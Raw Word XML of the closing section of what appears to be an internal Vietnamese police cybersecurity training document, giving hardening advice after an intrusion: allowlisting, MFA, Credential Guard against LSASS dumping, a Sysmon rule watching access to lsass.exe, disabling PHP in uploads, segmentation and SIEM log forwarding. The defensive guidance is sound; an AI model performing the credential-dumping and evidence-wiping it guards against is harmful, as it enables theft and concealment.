        <w:t>Về phương diện kỹ thuật, ưu tiên hàng đầu cần thực hiện bao gồm: kích hoạt chính sách kiểm soát thực thi ứng dụng (Application Allowlisting) nhằm ngăn file .exe lạ chạy từ thư mục %TEMP%; triển khai xác thực đa yếu tố (MFA) cho toàn bộ dịch vụ truy cập từ xa bao gồm SSH và RDP; bật Credential Guard (Windows 10+) và cấu hình lsass.exe chạy như Protected Process để ngăn kỹ thuật LSASS Dump; triển khai Sysmon với cấu hình phát hiện ProcessAccess đến lsass.exe (Event ID 10); cấu hình phân quyền thư mục web loại bỏ quyền thực thi PHP trên thư mục /uploads/ (php_flag engine off); áp dụng nguyên tắc đặc quyền tối thiểu (Least Privilege) cho tài khoản kết nối database; cấu hình network segmentation để client PC và server ở VLAN riêng biệt không SSH trực tiếp được; và thiết lập forward log realtime về SIEM server riêng — đây là biện pháp quan trọng nhất ngăn đối tượng xóa bằng chứng từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Về phương diện quy trình và con người, cần tổ chức định kỳ các buổi diễn tập nhận diện email lừa đảo (Phishing Simulation) cho toàn thể cán bộ, đặc biệt đối với nhân sự thường xuyên tiếp nhận văn bản điện tử từ các cơ quan bên ngoài. Song song đó, cần xây dựng quy trình báo cáo sự cố (Incident Reporting Procedure) rõ ràng để rút ngắn thời gian phát hiện và ứng phó khi có sự kiện bất thường xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="004B3F33">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDD7EE"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:spacing w:before="400" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>— TÀI LIỆU NỘI BỘ — PHỤC VỤ HUẤN LUYỆN AN NINH MẠNG —</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B3F33" w:rsidRDefault="001C21EA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Phòng An ninh mạng và PCTP sử dụng công nghệ cao — Công an tỉnh Quảng Ninh</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004B3F33">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B79EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45485268"/>
    <w:lvl w:ilvl="0" w:tplc="DF22CF44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F7D09516">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EFFACDF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3348C2E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="864C89BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="34782D46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="58A658F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B06E0A96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="687492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F33"/>
    <w:rsid w:val="001C21EA"/>
    <w:rsid w:val="00224667"/>
    <w:rsid w:val="004B3F33"/>
    <w:rsid w:val="007C2626"/>
    <w:rsid w:val="007E5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BB19"/>
  <w15:docId w15:val="{65D8239F-8DD0-4C6E-9AD2-4294AD85D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60" w:after="160"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>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3271</Words>
  <Characters>18650</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>155</Lines>
  <Paragraphs>43</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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minhdomino98@hotmail.com</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-14T01:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-15T10:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>